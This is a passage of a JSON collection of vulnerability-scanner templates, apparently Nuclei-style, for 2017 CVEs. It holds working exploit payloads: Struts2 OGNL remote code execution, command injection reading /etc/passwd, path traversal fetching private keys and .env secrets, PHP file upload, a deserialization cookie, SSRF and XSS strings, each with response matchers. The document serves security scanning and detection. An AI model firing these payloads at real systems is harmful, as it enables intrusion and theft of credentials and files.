Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Analytics by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18493","info":{"name":"Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Admin Page by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["forbidden - number in author","</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18518","info":{"name":"SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"SMTP by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Raygun4WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-3131","info":{"name":"FortiOS 5.4.0 to 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","GET /ng/fortiview/app/15832%22%20onmouseover=alert(document.domain)%20x=%22y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["id_15832\" onmouseover=\"alert(document.domain)\""]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-18517","info":{"name":"Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pinterest by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18564","info":{"name":"Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/sender/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Sender by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18500","info":{"name":"Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Buttons Pack by\")"],"condition":"and"}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18505","info":{"name":"BestWebSoft's Twitter < 2.55 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Twitter Button by\")"],"condition":"and"}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18527","info":{"name":"Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pagination by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Amty Thumb","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18557","info":{"name":"Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Maps by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7855","info":{"name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["lang=\"\"><img src=x onerror=alert(document.domain)>","IceWarp"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-18501","info":{"name":"Social Login by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Login by\")"],"condition":"and"}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/emag-marketplace-connector/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3133","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\nDNT: 1\n\ncsrfmiddlewaretoken={{csrf}}&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%0A\n","GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: 